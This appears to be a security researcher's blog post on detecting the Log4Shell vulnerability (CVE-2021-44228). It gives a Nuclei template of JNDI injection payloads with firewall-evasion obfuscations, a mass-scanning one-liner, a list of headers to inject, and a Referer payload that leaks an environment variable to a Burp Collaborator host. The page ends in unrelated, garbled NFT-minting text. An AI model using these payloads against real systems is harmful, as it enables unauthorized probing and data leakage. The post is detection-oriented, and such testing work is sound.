I’m Ahmed Salah Abdalhfaz (Elsfa7–110)

Log4Shell: RCE 0-day Detect CVE-2021–44228

hello i am Ahmed Salah Abdalhfaz (Elsfa7-110)

السلام عليكم ورحمة الله وبركاته

A few hours ago, a 0-day exploit in the popular Java logging library log4j2 was discovered that results in Remote Code Execution (RCE) by logging a certain string.

Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it “Log4Shell” for short.

Log4j versions prior to 2.15.0 are subject to a remote code execution vulnerability via the ldap JNDI parser.
 As per Apache’s Log4j security guide: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.

Affected Apache log4j2 Versions

2.0 <= Apache log4j <= 2.14.1

Personally, I have several ways to exploit this vulnerability
Without going into depth, I will only teach you the ways by which you know if the application is infected or not

first thing you must using a DNS logger (such as dnslog.cn), you can generate a domain name and use this in your test payloads:

add this payload to all input form in the app to test it


Refreshing the page will show DNS queries which identify hosts who have triggered the vulnerability.

This is good, but manually, let’s make it faster to check many apps quickly

Now I’m going to check the vulnerability, but I’ll use Nuclei

After collecting many sources, I made a template that speeds up the process for us to quickly check

We also used methods to bypass the firewall

id: log4jshell-detect

name: Log4j Detect for Logs
author: ELSFA7110
severity: high

- method: GET
- "{{BaseURL}}/?test=${jndi:ldap://{{interactsh-url}}/a}"
- "{{BaseURL}}/?test=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}"
- "{{BaseURL}}/?test=${${::-j}ndi:rmi://{{interactsh-url}}/ass}"
- "{{BaseURL}}/?test=${jndi:rmi://{{interactsh-url}}}"
- "{{BaseURL}}/?test=${${lower:jndi}:${lower:rmi}://{{interactsh-url}}/poc}"
- "{{BaseURL}}/?test=${${lower:${lower:jndi}}:${lower:rmi}://{{interactsh-url}}/poc}"
- "{{BaseURL}}/?test=${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{interactsh-url}}/poc}"
- "{{BaseURL}}/?test=${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{interactsh-url}}/poc}"

Host: "{{Host}}"
User-Agent: "Mozilla ${jndi:ldap://{{interactsh-url}}/a}"

matchers-condition: or
- type: word
part: interactsh_protocol
name: http
- "http"

- type: word
part: interactsh_protocol
name: dns
- "dns"

Here we have replaced the dnslog.cn to interact.sh

to use this method of exploitation
First we collect all the subdomains or domains that you want to scan

you can make this with one line

subfinder -d test.com -silent -t 200 | httpx -silent -threads 200 | nuclei -t log4jshell.yaml

You can also use burp suite plugins to check this vulnerability

by ActiveScan++ and Log4j2Scan

from Headers:

use the handy Burp Proxy Match and Replace rules for finding #Log4Shell, while browsing targets. Pretty simple but effective.

  • X-Client-IP
  • X-Remote-IP
  • X-Remote-Addr
  • X-Forwarded-For
  • X-Originating-IP
  • User-Agent
  • Referer
  • CF-Connecting_IP
  • True-Client-IP
  • X-Forwarded-For
  • Originating-IP
  • X-Real-IP
  • X-Client-IP
  • Forwarded
  • Client-IP
  • Contact
  • X-Wap-Profile
  • X-Api-Version

for ex:

Referer: ${jndi:ldap://${env:user}.t3x1dvzl2q438a36qbrql778tzzpne.burpcollaborator.net/a}

Now we’re trying to bypass the firewall

i will use log4j-payload-generator is a plugin for woodpecker framework to produce log4 jndi injection vulnerability payload. At present, the following 5 types of payloads can be produced with one click.

by obfuscate methods

Please don’t forget to follow me on the Twitter to watch new blogs from me on https://twitter.com/Elsfa7110 and if you have any comment also send to me thanks. Feel free to connect with me if you have anything.


Connect Wallet

  • Logo
  • Logo
  • Logo
  • Logo

Wallet are many variations of pass
ges of availabl.

Collect your NFT before
the deadline.

  • Remaining
    725 / 725 Minted
  • Quantity / 0.25 ETH
  • Total Price
    0.5 ETH

Presale & whitelist : Soldout